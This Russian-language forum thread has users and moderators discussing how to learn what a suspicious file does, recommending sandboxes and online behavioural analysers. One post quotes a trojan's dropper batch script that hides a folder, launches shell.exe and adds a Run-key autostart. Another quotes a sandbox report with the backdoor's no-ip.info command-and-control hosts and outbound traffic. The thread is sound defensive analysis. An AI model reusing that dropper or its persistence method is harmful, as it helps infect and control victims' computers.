Показано с 1 по 18 из 18.

как узнать что делает вирус

  1. #1
    Junior Member Репутация
    Регистрация
    03.10.2008
    Сообщений
    7
    Вес репутации
    30

    как узнать что делает вирус

    Мне частенько приходится встречатся с новыми модификациями вирусов, которые вылавливаются собственными руками ,
    по принципу подозрительного месту расположения, атрибутов, типу запуска и т. д.
    хотелось бы узнать как проверить-узнать
    каким образом работает этот зловред -
    тоесть к каким ip обращается, что отсылает .
    какие службы запускает, где и что в реестре пишет, какие папки создает, какие службы запускает, блокирует ,использует?
    Посоветуйте каким софтом для этого пользоваться





    p.s.
    вот к примеру нашел вчера вот это https://www.virustotal.com/file/4544...is/1341173867/
    и это точно троян или просто его часть

  2. Реклама
     

  3. #2

  4. #3
    Junior Member Репутация
    Регистрация
    03.10.2008
    Сообщений
    7
    Вес репутации
    30
    с этим •http://camas.comodo.com/ понятно
    а что здесь •http://threatexpert.com мельком взглянув вроде как пограммы для моих задач
    к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил


    а есть ли софт что бы проверять все локально и без наличия интернета
    Последний раз редактировалось visokosnik; 02.07.2012 в 02:47.

  5. #4
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Никита Соловьев
    Регистрация
    15.02.2009
    Сообщений
    12,437
    Вес репутации
    904
    Цитата Сообщение от visokosnik Посмотреть сообщение
    а есть ли софт что бы проверять все локально и без наличия интернета
    Есть песочницы, например http://www.sandboxie.com/

    Цитата Сообщение от visokosnik Посмотреть сообщение
    к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил
    http://www.threatexpert.com/submit.aspx - на этой странице можно отправить файлы без апплетов.

    Ещё он-лайн вариант: http://www.norman.com/security_center/security_tools/

    Пробуйте.

  6. #5
    Junior Member Репутация
    Регистрация
    03.10.2008
    Сообщений
    7
    Вес репутации
    30
    очень понравилась работа http://camas.comodo.com/
    а есть ли еще ему подобные сервисы

  7. #6
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Никита Соловьев
    Регистрация
    15.02.2009
    Сообщений
    12,437
    Вес репутации
    904
    Мне тоже из всех он-лайн анализаторов нравится COMODO. Все сервисы, ссылки на которые я здесь привёл выполняют аналогичные функции - анализ поведения.

  8. #7
    Странствующий хэлпер Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    90,456
    Вес репутации
    2914
    Цитата Сообщение от visokosnik Посмотреть сообщение
    вот к примеру нашел вчера
    Детект 2/42 не есть гарантия наличия вируса
    Microsoft MVP 2012, 2013, 2014, 2015, 2016 Consumer Security

  9. #8
    Administrator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Ilya Shabanov
    Регистрация
    29.03.2007
    Сообщений
    1,272
    Вес репутации
    172
    Когда-то для тестовых целей я делал просто. Ставил программу для контроля файловой системы, Adinf и аналог + программу для контроля изменений реестра. Далее делаешь снепшот, запускаешь вредоноса и смотришь куда он прописался и что где раскидал

    Есть решений 2 в 1 - это Total Unstaller http://www.martau.com/ Конечно авторы проги делали ее для другого Программ платная, но все сделано удобно.

    Добавлено через 41 секунду

    Но в реалтайме так конечно не отследишь, что вредонос делает.
    Последний раз редактировалось Ilya Shabanov; 02.07.2012 в 17:33. Причина: Добавлено
    VirusInfo.info & Anti-Malware.ru | Мой блог |

  10. Ilya Shabanov получил(а) благодарность за это сообщение от


  11. #9
    Junior Member Репутация
    Регистрация
    03.10.2008
    Сообщений
    7
    Вес репутации
    30
    Цитата Сообщение от thyrex Посмотреть сообщение
    Детект 2/42 не есть гарантия наличия вируса
    согласен ,НО!!!
    не раз бывало такое что сегодня 0 из 42
    завтра 5 из42
    а через неделю 37 из 42

    - - - Добавлено - - -

    подскажите а как в комоду отправить фаил shell.exe который запускается батником
    Код:
    @echo off
    set ztmp=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
    set MYFILES=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\afolder
    set bfcec=t18807.exe
    attrib +h C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
    @echo off
    copy shell.exe %temp%\afolder
    %temp%\afolder\shell.exe -2  
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "shell" /d "%temp%\afolder\shell.exe -2" /t REG_SZ /f >nul
    attrib +h %temp%\afolder
    то есть если shell.exe запускать без параметров, он ни каких действий делать не будет, а
    с такими параметрами shell.exe -2
    покажет себя во всей красе


    P.S.хитрый троянчик
    Последний раз редактировалось visokosnik; 02.07.2012 в 22:35.

  12. #10
    Administrator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Ilya Shabanov
    Регистрация
    29.03.2007
    Сообщений
    1,272
    Вес репутации
    172
    не раз бывало такое что сегодня 0 из 42
    завтра 5 из42
    а через неделю 37 из 42
    Бывает так, но бывает и иначе. Что послезавтра становится 7-10 и дальше не наращивается кол-во.

    Все дело в том, что куча вендоров тупо паразитируют на коллегах. Смотрят на конкурентов и добавляют автоматом детект себе. Увы, таких компаний много. Поэтому не нужно ориентировать на массу. ИМХО правильнее смотреть на выборку из 7-10 наиболее авторитетных вендора, которые сами проводят анализ и имеют свои базы знаний (включая облачные).
    VirusInfo.info & Anti-Malware.ru | Мой блог |

  13. #11
    Junior Member Репутация
    Регистрация
    03.10.2008
    Сообщений
    7
    Вес репутации
    30
    именно поэтому я открыл эту тему
    что бы самому по действиям файла ,убедится есть ли в нем зловредный код , а не тупо смотреть на результаты virustotal
    вот к примеру последний из пойманных
    Код:
    #
    
    Filename(s)
    
    File Size
    
    File MD5
    
    Alias / Other Info
    
     
    
    1
     
    %Temp%\afolder\shell.exe 
    
    11,781 bytes
     
    0x70B23E4AD55DE99EBB65720A436069F8
     
    Trojan.Win32.Swrort [Ikarus]
     
    
    
    2
     
    [file and pathname of the sample #1] 
    
    69,504 bytes
     
    0xFE90B0F3A569B2DB346DFB620D4E5674
     
    Win32.SuspectCrc [Ikarus]
     
    
    The following directories were created:
     %Temp%\afolder
     %Temp%\ztmp
     
     
    
    
    
    
    
    Memory Modifications
    
     There were new processes created in the system:
     
    
    
    
    Process Name
    
    Process Filename
    
    Main Module Size
    
     
    
    shell.exe
    
    %Temp%\afolder\shell.exe
    
    28,672 bytes
    
     
    
    [filename of the sample #1]
    
    [file and pathname of the sample #1]
    
    10,371,072 bytes
    
    Registry Modifications
    
     The newly created Registry Value is:
     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
     shell = "%Temp%\afolder\shell.exe -2"
     
    so that shell.exe runs every time Windows starts
    
    Other details
    
     To mark the presence in the system, the following Mutex object was created:
     )!VoqA.I4
     The following Host Names were requested from a host database:
     fad.no-ip.info
     sudo.no-ip.info
     ser.no-ip.info
     brutal.no-ip.info
     There was a registered attempt to establish connection with the remote host. The connection details are:
    
    Remote Host
    
    Port Number
    
    fad.no-ip.info
    
    443
    Outbound traffic
    
     There was an outbound traffic produced on port 443:
     
    00000000 | E570 6780 DE78 F14E 89C7 3DA4 3AA9 4333 | .pg..x.N..=.:.C3
    00000010 | AECF 0415 A67F AE05 C4C0 2270 64E5 6A3E | .........."pd.j>
    00000020 | 559E 8160 8D5E 9BB3 6712 726E 721F 1677 | U..`.^..g.rnr..w
    00000030 | 57F1 C6F0 E209 EFBD 9BD4 972C 9CB3 4753 | W..........,..GS
    00000040 | E1D0 2E6A 92EF 5A4D 61D3 C03C 7E66 BAE5 | ...j..ZMa..<~f..
    00000050 | 65E6 D851 4581 6B89 519A 4EC6 61F3 EFB6 | e..QE.k.Q.N.a...
    00000060 | D8E6 71DB EDE6 C172 3A9D C1CB CE6B 6DA4 | ..q....r:....km.
    00000070 | BA61 39E1 689A 95A4 6077 0FFF 7A3E 6821 | .a9.h...`w..z>h!
    00000080 | 072C BD41 6085 93A8 623F BF45 D6D7 C3B3 | .,.A`...b?.E....
    00000090 | DB0C F51E CFF2 7BA6 7BDA E715 877B 31BA | ......{.{....{1.
    000000A0 | 70D8 5EAB 7B67 FC57 55CE 8C24 5D9E F9B8 | p.^.{g.WU..$]...
    000000B0 | E897 7A06 685A AD6E 1DE4 5CBA 7123 8156 | ..z.hZ.n..\.q#.V
    000000C0 | 04D8 2F87 78C6 1286 F615 D3B3 D6C8 1A86 | ../.x...........
    000000D0 | 9358 C19F 0D12 C7DC E033 0FE0 29CE E978 | .X.......3..)..x
    000000E0 | 6A72 33B4 4F3F 83F1 BE8A C725 0AB6 AE4C | jr3.O?.....%...L
    000000F0 | D9D2 1FCD 7C36 3595 304B 1EFE 20D8 6332 | ....|65.0K.. .c2

    хотя на вирустотале https://www.virustotal.com/file/db29...07c6/analysis/
    промолчали самые известные
    avira
    avast
    avg
    DrWeb
    Kaspersky
    NOD32
    и тд

    а вот результаты комоды
    http://camas.comodo.com/cgi-bin/subm...cf5a90e70007c6

    вот так ведь сразу видно что это бекдор

  14. #12
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    07.07.2005
    Адрес
    Moscow region
    Сообщений
    30,463
    Вес репутации
    2495
    Цитата Сообщение от Ilya Shabanov Посмотреть сообщение
    Когда-то для тестовых целей я делал просто. Ставил программу для контроля файловой системы, Adinf и аналог + программу для контроля изменений реестра. Далее делаешь снепшот, запускаешь вредоноса и смотришь куда он прописался и что где раскидал
    утилиты от Матусека здорово помогают в этом деле.
    Павел
    AVZ HijackThis помощь с 10-00 до 18-00МСК

    Windows7, SEP(work)
    WindowsXP KIS(home)

    На up не реагирую

  15. #13
    Junior Member Репутация
    Регистрация
    03.10.2008
    Сообщений
    7
    Вес репутации
    30
    Цитата Сообщение от PavelA Посмотреть сообщение
    утилиты от Матусека здорово помогают в этом деле.
    а кто токой Матусека? можно поподробней

  16. #14
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Никита Соловьев
    Регистрация
    15.02.2009
    Сообщений
    12,437
    Вес репутации
    904
    Цитата Сообщение от visokosnik Посмотреть сообщение
    а кто токой Матусека? можно поподробней
    Не кто, а что.

    matousec.com

  17. #15
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    07.07.2005
    Адрес
    Moscow region
    Сообщений
    30,463
    Вес репутации
    2495
    Я немного ошибся и имел, конечно, в виду другую известную личность: Марка Русиновича, ныне сотрудника МС. Его блог, кстати есть на русском, содержит много информации по изучению различных программ.
    Павел
    AVZ HijackThis помощь с 10-00 до 18-00МСК

    Windows7, SEP(work)
    WindowsXP KIS(home)

    На up не реагирую

  18. #16
    Administrator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Ilya Shabanov
    Регистрация
    29.03.2007
    Сообщений
    1,272
    Вес репутации
    172
    Слушал тренинг Марка, где он показывал как при помощи только его утилит SysInternals можно обнаружить подозрительные процессы и удалить их. Никаких других средств он не использовал при этом.
    VirusInfo.info & Anti-Malware.ru | Мой блог |

  19. Ilya Shabanov получил(а) благодарность за это сообщение от


  20. #17
    Junior Member (OID) Репутация
    Регистрация
    12.06.2014
    Сообщений
    1
    Вес репутации
    10
    Здравствуйте.
    Только что мне один человек сбросил файл под видом песни, но с разрешением *.exe, прогнал его через Comodo и вот результат http://camas.comodo.com/cgi-bin/subm...47f8627fca443f

    Я не спец, но хотелось бы узнать, что эти результаты тестов говорят? Расшифруйте, пожалуйста.

    З.Ы.
    "Keys Created
    • Keys Changed
    • Keys Deleted"
    Это значит создание, изменение и удаление паролей?

  21. #18
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Никита Соловьев
    Регистрация
    15.02.2009
    Сообщений
    12,437
    Вес репутации
    904
    Цитата Сообщение от Владимир Клименко Посмотреть сообщение
    Это значит создание, изменение и удаление паролей?
    Нет, это означает создание, изменение или удаление ключей системного реестра.
    Из этого отчёта видно, что программа осуществляет HTTP запрос на определённый сайт (указан в таблице).

    Если вас интересуют подробности о данной вредоносной программы, вы можете прислать её нам и получить ответ в соответствующей теме.

Похожие темы

  1. Что делает вирус?
    От contramundum в разделе Опросы
    Ответов: 6
    Последнее сообщение: 07.01.2013, 22:10
  2. Ответов: 16
    Последнее сообщение: 12.11.2011, 20:55
  3. Помогите узнать,найти и удалить вирус
    От siniypank в разделе Помогите!
    Ответов: 59
    Последнее сообщение: 22.02.2009, 07:01
  4. как узнать что испортил вирус?
    От Zdraitsa в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 20.03.2006, 09:25
  5. Как узнать,понять и обнаружить вирус.
    От Dark_Blaze в разделе Общая сетевая безопасность
    Ответов: 9
    Последнее сообщение: 08.01.2006, 22:55

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00822 seconds with 23 queries